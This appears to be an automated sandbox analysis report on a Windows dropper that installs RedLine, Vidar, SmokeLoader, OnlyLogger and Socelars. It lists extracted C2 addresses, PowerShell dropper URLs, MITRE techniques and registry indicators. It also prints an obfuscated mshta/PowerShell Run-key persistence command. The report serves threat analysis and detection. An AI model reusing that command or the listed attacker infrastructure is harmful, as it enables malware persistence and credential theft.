onlylogger | 747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31

Analysis

max time kernel
151s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
10-03-2022 00:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exe
Size

4.5MB
MD5

d9f87a4d4e28e7d17159c17620a3816f
SHA1

245466ad4d5fe2a0a5140769c3ac5ba66799e173
SHA256

747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31
SHA512

f3960ebed32e19a10b51bef4d3801a832a58ef55e5aff32e94a7e6f3686437b2c6f45be4641864eeee793bb050cf8f159c45c8f7b1feea5d429c7483a7e0efa0

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NON.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/NAN.oo

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://62.204.41.192/-RED/RED.oo

Extracted

Family

redline

Botnet

DomAni

ergerr3.top:80

Extracted

Family

vidar

Version

39.4

Botnet

706

https://sergeevih43.tumblr.com/

Attributes

profile_id
706

Extracted

Family

smokeloader

Version

2020

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

Travis

5.182.5.22:33809

Attributes

auth_value
6fa3251b9d70327e7d1e5851c226af23

Extracted

Family

vidar

Version

50.6

Botnet

937

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

redline

Botnet

jack

5.182.5.203:33873

Attributes

auth_value
6d03d90d7d897b871fe8bfcaec8c6ae0

Extracted

Family

redline

Botnet

ruzki (check bio)

103.133.111.182:44839

Attributes

auth_value
767fa45398d3ac4a23de20d0480c2b03

Extracted

Family

redline

Botnet

fdfsdf

86.107.197.196:63065

Attributes

auth_value
49c341b88f13528ba52befa3c6ca7ebb

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 8 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3260-200-0x0000000000400000-0x000000000041E000-memory.dmp	family_redline
behavioral2/memory/2948-258-0x0000000000C80000-0x0000000000EA1000-memory.dmp	family_redline
behavioral2/memory/1512-257-0x0000000000AF0000-0x0000000000D13000-memory.dmp	family_redline
behavioral2/memory/4664-294-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2948-256-0x0000000000C80000-0x0000000000EA1000-memory.dmp	family_redline
behavioral2/memory/3936-238-0x0000000000F80000-0x0000000000FA0000-memory.dmp	family_redline
behavioral2/memory/1512-242-0x0000000000AF0000-0x0000000000D13000-memory.dmp	family_redline
behavioral2/memory/2948-241-0x0000000000C80000-0x0000000000EA1000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

OnlyLogger Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1636-280-0x0000000002140000-0x0000000002184000-memory.dmp	family_onlylogger

Vidar Stealer 3 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1852-211-0x0000000002130000-0x00000000021CD000-memory.dmp	family_vidar
behavioral2/memory/1852-217-0x0000000000400000-0x000000000052D000-memory.dmp	family_vidar
behavioral2/memory/944-275-0x0000000000400000-0x0000000002EEE000-memory.dmp	family_vidar

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\setup_install.exe	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\libcurlpp.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\libcurl.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\libstdc++-6.dll	aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS0E31B73E\libstdc++-6.dll	aspack_v212_v242

Blocklisted process makes network request 8 IoCs

Processes:

cmd.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
219	3488	cmd.exe
227	3488	cmd.exe
232	3488	cmd.exe
239	3488	cmd.exe
269	4568	powershell.exe
270	4296	powershell.exe
271	4464	powershell.exe
283	4568	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 42 IoCs

Processes:

setup_installer.exesetup_install.exearnatic_7.exearnatic_1.exearnatic_5.exearnatic_3.exearnatic_6.exearnatic_4.exearnatic_2.exejfiag3g_gg.exejhuuee.exeliqian.exeUGloryStp.exejfiag3g_gg.exearnatic_6.exejfiag3g_gg.exejfiag3g_gg.exeMXiSZ80F3NuU3QFhkzcKK6R5.exeWerFault.exelT7Ktq7RZVK5NGevobiXldEi.exe9AMxt77ZfihiU4VeKdxGSyym.exeAmZEkXB56CCIr8oGgBm2t31G.exedbDta9ljNdTdYzsF60vMQeWW.exelIzF3MpI9W8WHI55g3JIRBYG.exereg.exeRNxU6z5r9OWdg_t70GnZrQfQ.exeqy2IEmqybmpCEpYPWmuUaf0W.exes_7xA2ANj10yKSSQQgynJ9xW.exe5Bd7ndGVBXBbpWnDKJ_jqJyY.exeNZnkrHKpnQ2ppyC0J5WWbCbj.execmd.exewQG0qtyPvykccUzsfzHkOlc4.exewU17U4w0H5bF7mZyHs4cVqtG.exeMVUiaEbYet7ZR5D0VaFo322l.exeezWBROZT4uZYUwrxDwo0l1Wh.exeInstall.exelIzF3MpI9W8WHI55g3JIRBYG.exef80a76f6-eb7a-40f6-93a0-934db13c03a5.exeInstall.exeAccostarmi.exe.pifYAnxQmd.exeeuwtwbh

pid	process
992	setup_installer.exe
3436	setup_install.exe
2112	arnatic_7.exe
1852	arnatic_1.exe
3448	arnatic_5.exe
3700	arnatic_3.exe
752	arnatic_6.exe
3684	arnatic_4.exe
2596	arnatic_2.exe
3008	jfiag3g_gg.exe
3888	jhuuee.exe
1456	liqian.exe
3892	UGloryStp.exe
3760	jfiag3g_gg.exe
3260	arnatic_6.exe
1120	jfiag3g_gg.exe
2452	jfiag3g_gg.exe
2436	MXiSZ80F3NuU3QFhkzcKK6R5.exe
2972	WerFault.exe
4080	lT7Ktq7RZVK5NGevobiXldEi.exe
1636	9AMxt77ZfihiU4VeKdxGSyym.exe
2948	AmZEkXB56CCIr8oGgBm2t31G.exe
1392	dbDta9ljNdTdYzsF60vMQeWW.exe
1528	lIzF3MpI9W8WHI55g3JIRBYG.exe
3248	reg.exe
944	RNxU6z5r9OWdg_t70GnZrQfQ.exe
1512	qy2IEmqybmpCEpYPWmuUaf0W.exe
3936	s_7xA2ANj10yKSSQQgynJ9xW.exe
3044	5Bd7ndGVBXBbpWnDKJ_jqJyY.exe
4044	NZnkrHKpnQ2ppyC0J5WWbCbj.exe
3488	cmd.exe
480	wQG0qtyPvykccUzsfzHkOlc4.exe
952	wU17U4w0H5bF7mZyHs4cVqtG.exe
3584	MVUiaEbYet7ZR5D0VaFo322l.exe
4192	ezWBROZT4uZYUwrxDwo0l1Wh.exe
4696	Install.exe
4664	lIzF3MpI9W8WHI55g3JIRBYG.exe
5032	f80a76f6-eb7a-40f6-93a0-934db13c03a5.exe
5012	Install.exe
1404	Accostarmi.exe.pif
796	YAnxQmd.exe
1888	euwtwbh

UPX packed file 10 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Documents\lT7Ktq7RZVK5NGevobiXldEi.exe	upx
C:\Users\Admin\Documents\lT7Ktq7RZVK5NGevobiXldEi.exe	upx

Checks BIOS information in registry 2 TTPs 3 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

wU17U4w0H5bF7mZyHs4cVqtG.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	wU17U4w0H5bF7mZyHs4cVqtG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	wU17U4w0H5bF7mZyHs4cVqtG.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

setup_installer.exearnatic_3.exelT7Ktq7RZVK5NGevobiXldEi.exeRNxU6z5r9OWdg_t70GnZrQfQ.exeInstall.exe747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exearnatic_7.exearnatic_5.exedbDta9ljNdTdYzsF60vMQeWW.exe9AMxt77ZfihiU4VeKdxGSyym.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	setup_installer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	arnatic_3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	lT7Ktq7RZVK5NGevobiXldEi.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	RNxU6z5r9OWdg_t70GnZrQfQ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	Install.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	747fe86c41f043508bfc6ae79b5cbc5662ca4fa1ce7ce682b1ae629798db2e31.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	arnatic_7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	arnatic_5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	dbDta9ljNdTdYzsF60vMQeWW.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	9AMxt77ZfihiU4VeKdxGSyym.exe

Loads dropped DLL 11 IoCs

Processes:

setup_install.exerUNdlL32.eXearnatic_2.exeRNxU6z5r9OWdg_t70GnZrQfQ.exeeuwtwbh

pid	process
3436	setup_install.exe
3436	setup_install.exe
3436	setup_install.exe
3436	setup_install.exe
3436	setup_install.exe
3436	setup_install.exe
3264	rUNdlL32.eXe
2596	arnatic_2.exe
944	RNxU6z5r9OWdg_t70GnZrQfQ.exe
944	RNxU6z5r9OWdg_t70GnZrQfQ.exe
1888	euwtwbh

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 2 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/952-269-0x00007FF7E1910000-0x00007FF7E1EBE000-memory.dmp	themida
behavioral2/memory/952-266-0x00007FF7E1910000-0x00007FF7E1EBE000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

jhuuee.exepowershell.exeezWBROZT4uZYUwrxDwo0l1Wh.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	jhuuee.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FaxOptions = "mshta vbscript:(CreateObject(\"WS\"+\"C\"+\"rI\"+\"Pt.ShEll\")).Run(\"powershell [Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('Software\\Microsoft\\Fax').GetValue('Drivers')).EntryPoint.Invoke(0,@())\",0)(window.close)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Eyxrppteq = "\"C:\\Users\\Admin\\AppData\\Roaming\\Mzpexsf\\Eyxrppteq.exe\""	ezWBROZT4uZYUwrxDwo0l1Wh.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

wU17U4w0H5bF7mZyHs4cVqtG.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	wU17U4w0H5bF7mZyHs4cVqtG.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

19 ip-api.com
124 ipinfo.io
125 ipinfo.io
282 ipinfo.io

flow	ioc
19	ip-api.com
124	ipinfo.io
125	ipinfo.io
282	ipinfo.io

Drops file in System32 directory 6 IoCs

Processes:

Install.exepowershell.exepowershell.exeYAnxQmd.exe

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	YAnxQmd.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	YAnxQmd.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

AmZEkXB56CCIr8oGgBm2t31G.exeqy2IEmqybmpCEpYPWmuUaf0W.exe

pid process

2948 AmZEkXB56CCIr8oGgBm2t31G.exe
1512 qy2IEmqybmpCEpYPWmuUaf0W.exe

pid	process
2948	AmZEkXB56CCIr8oGgBm2t31G.exe
1512	qy2IEmqybmpCEpYPWmuUaf0W.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

arnatic_6.exelIzF3MpI9W8WHI55g3JIRBYG.exepowershell.exepowershell.exeezWBROZT4uZYUwrxDwo0l1Wh.exe

description	pid	process	target process
PID 752 set thread context of 3260	752	arnatic_6.exe	arnatic_6.exe
PID 1528 set thread context of 4664	1528	lIzF3MpI9W8WHI55g3JIRBYG.exe	lIzF3MpI9W8WHI55g3JIRBYG.exe
PID 4296 set thread context of 2756	4296	powershell.exe	RegSvcs.exe
PID 4464 set thread context of 2468	4464	powershell.exe	RegSvcs.exe
PID 4192 set thread context of 3744	4192	ezWBROZT4uZYUwrxDwo0l1Wh.exe	MSBuild.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe

Program crash 18 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3412	3264	WerFault.exe	rUNdlL32.eXe
3848	1852	WerFault.exe	arnatic_1.exe
4552	3248	WerFault.exe	y6jHLX3YnTYybwFvcHrByU2F.exe
4944	1636	WerFault.exe
4492	4044	WerFault.exe
4428	2436	WerFault.exe	MXiSZ80F3NuU3QFhkzcKK6R5.exe
4316	1636	WerFault.exe
4168	4044	WerFault.exe
4372	2436	WerFault.exe	MXiSZ80F3NuU3QFhkzcKK6R5.exe
316	3248	WerFault.exe	y6jHLX3YnTYybwFvcHrByU2F.exe
2996	1636	WerFault.exe
5080	1636	WerFault.exe	9AMxt77ZfihiU4VeKdxGSyym.exe
1912	1636	WerFault.exe	9AMxt77ZfihiU4VeKdxGSyym.exe
5024	1636	WerFault.exe	9AMxt77ZfihiU4VeKdxGSyym.exe
2972	1636	WerFault.exe	9AMxt77ZfihiU4VeKdxGSyym.exe
3104	1636	WerFault.exe	9AMxt77ZfihiU4VeKdxGSyym.exe
4896	1636	WerFault.exe	9AMxt77ZfihiU4VeKdxGSyym.exe
3656	2468	WerFault.exe	RegSvcs.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

euwtwbharnatic_2.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euwtwbh
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	arnatic_2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euwtwbh
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	euwtwbh

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

RNxU6z5r9OWdg_t70GnZrQfQ.exef80a76f6-eb7a-40f6-93a0-934db13c03a5.exepowershell.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RNxU6z5r9OWdg_t70GnZrQfQ.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	f80a76f6-eb7a-40f6-93a0-934db13c03a5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	f80a76f6-eb7a-40f6-93a0-934db13c03a5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0	powershell.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	powershell.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RNxU6z5r9OWdg_t70GnZrQfQ.exe

Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exe

pid process

4156 schtasks.exe
1596 schtasks.exe
1952 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2140 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3168 tasklist.exe
2652 tasklist.exe

pid	process
4156	schtasks.exe
1596	schtasks.exe
1952	schtasks.exe

pid	process
2140	timeout.exe

pid	process
3168	tasklist.exe
2652	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3104 taskkill.exe
1856 taskkill.exe
3756 taskkill.exe

pid	process
3104	taskkill.exe
1856	taskkill.exe
3756	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe

Modifies registry class 1 IoCs

Processes:

arnatic_3.exe

description ioc process

